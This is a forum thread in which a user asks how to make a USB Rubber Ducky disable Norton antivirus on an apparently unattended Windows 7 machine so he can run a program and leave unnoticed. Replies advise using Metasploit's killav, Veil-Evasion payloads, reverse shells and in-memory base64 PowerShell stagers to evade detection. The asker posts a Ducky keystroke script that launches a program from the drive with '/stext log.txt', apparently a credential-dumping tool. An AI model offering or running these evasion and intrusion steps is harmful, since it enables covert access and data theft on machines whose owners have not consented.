bigmat526 Posted June 13, 2017 Share Posted June 13, 2017 Hello everyone. I've flashed my Ducky to a Twin Ducky, hence I put on software (portable) with Command-Line Options. My goal is to successfully plug it into a Stand-Bye computer and actually make it work, make it execute. But the huge problem is the Anti-Virus. (Norton Small Business Edition). This AV keeps removing all the files and is really a pain in the ass. I was wondering if there was a way to once plugged in, let the Ducky (Temporary) Kill the Anti-Virus. Just so it doesn't have an scanning on, so it will not detect the file, and once everything is back up me and the Ducky will be gone. I have the Advantage because one, it's Windows 7 and the accounts that are being logged onto are Administrator-Privileged, so Pressing Yes or No with the Ducky will not be a problem. I really need help. 1. Plug in the Ducky 2. Payloads Activate; Kill's Anti-Virus (Short While just so files can get through) 3. Run the file (Command-Line) Be Out. I just need to learn how to Kill the AV. For Norton Small Business Edition it's pretty complex to just disable it straight from the Control Panel. Thanks, so much. -Mathew Quote Link to comment Share on other sites More sharing options...
datajumper Posted June 13, 2017 Share Posted June 13, 2017 if you use metasploit to gain a reverse_tcp connection once you gain a meterpreter session you can run the killav command but if the problem is that you cant get past the antivirus to drop your shell code or payload you can try Veil-Evasion create a payload with veil it has an option to encode ruby into your payload and several other methods or if you have physical accsess to the keyboard of the target machine and if you have enough time norton should be running in the bottom right hand corner just right click on the norton icon it should have a disable sheilds button .....disable it temporarely until you get whatever it is that you was trying to do but veil-evasion works 4 me gain a reverse tcp session then you are back doored in .... my recent exploit ...what i did was i had my metasploit listener setup at home then i put my veil-evasion payload on to a regular usb thumb drive and went to a friends house "i had permision lol" and i put it in the machine right clicked on the veil evasion payload and chose run as administrator and it walked past the antivirus no problem and i had my phone ssh 'd into my listening machine at home so i had full control on the go .......i know this isnt probably what you were looking for i hope it helped ...if not theres some really smart really experienced pentesters on this forum just hang around be patient one of these guys should be able to help Quote Link to comment Share on other sites More sharing options...
digip Posted June 13, 2017 Share Posted June 13, 2017 You need a payload that runs in memory and never touches disk. More than likely, a powershell exploit, if you can get to powershell. You wan tto go to the command line before trying to kill AV, and if possible, work around it, without having to kill it to get your reverse shell first. Anything that the system can read off the thumb drive as a file, AV is going to kill, which is why you use powershell to decode directly into memory your program to execute, which can be stored as simple base64 text, no executables to trip AV. Quote Link to comment Share on other sites More sharing options...
bigmat526 Posted June 14, 2017 Author Share Posted June 14, 2017 This is the code: DELAY 1000 GUI R DELAY 100 STRING powershell DELAY 100 ENTER DELAY 1000 STRING $usbPath = Get-WMIObject Win32_Volume | ? { $_.Label -eq 'D' } | select name DELAY 500 ENTER STRING cd $usbPath.name DELAY 100 ENTER STRING ./p /stext log.txt DELAY 100 ENTER STRING exit DELAY 100 ENTER "P" is the program i am trying to execute which support's command-line features. Sorry I am completely new to this, sorry for asking for so much but how would I manage to this? Quote Link to comment Share on other sites More sharing options...
digip Posted June 14, 2017 Share Posted June 14, 2017 Check the ducky section maybe? There should be examples for reverse shells in base64 stagers(hopefully) or some kind of example that runs a base64 payload in memory. If not there, sure googling will turn up something. The main thing about the ducky is you might want to use it to write to for mass storage, but you probably don't want payloads in the mass storage side, as AV will pick them up, hence the base64 encoding of a binary to decode and run only in memory, which will help hide your steps. Darren covers using a stager here - https://www.hak5.org/episodes/hak5-2110-how-to-get-a-reverse-shell-in-3-seconds-with-the-usb-rubber-ducky but if I recall, his was for a reverse shell that downloads a separate PS1 script from the web, which might get caught by AV, but I can't remember if he makes it run from ram for the whole process or if it ever downloads to disk. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.